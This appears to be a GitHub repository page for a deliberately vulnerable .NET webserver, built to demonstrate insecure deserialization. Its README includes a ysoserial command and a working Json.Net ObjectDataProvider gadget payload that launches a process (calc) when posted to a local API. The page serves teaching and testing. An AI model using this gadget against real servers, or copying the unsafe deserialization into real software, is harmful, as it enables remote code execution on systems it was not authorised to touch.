Skip to content
A small webserver vulnerable to insecure deserialization
Branch: master
Clone or download

Latest commit

Fetching latest commit…
Cannot retrieve the latest commit at this time.


Type Name Latest commit message Commit time
Failed to load latest commit information.
DeserializationPOC initial commit Nov 30, 2017
LICENSE Initial commit Nov 30, 2017 Added readme Nov 30, 2017


Insecure deserialization is a severe issue, which allows an attacker to exploit a server just by sending a malicious JSON. This is a new issue in the OWASP Top 10 2017 release - A8. This POC is built based on a white paper from BlackHat USA 2017 talk. You can find a recording of the talk here - this recording is from AppSec USA 2017.


  • Use VS to open the solution and launch the server.
  • Use curl/postman to send malicious request to the API.

Example payload

This is an example payload, as generated by To generate it, I used the following command: ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc":

    "body": {
        "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName": "Start",
        "MethodParameters": {
            "$type": "System.Collections.ArrayList, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "$values": [
                "/c calc"
        "ObjectInstance": {
            "$type": "System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"

Post this payload to http://localhost:8085/api/hello. A new calc instance should be open.

You can’t perform that action at this time.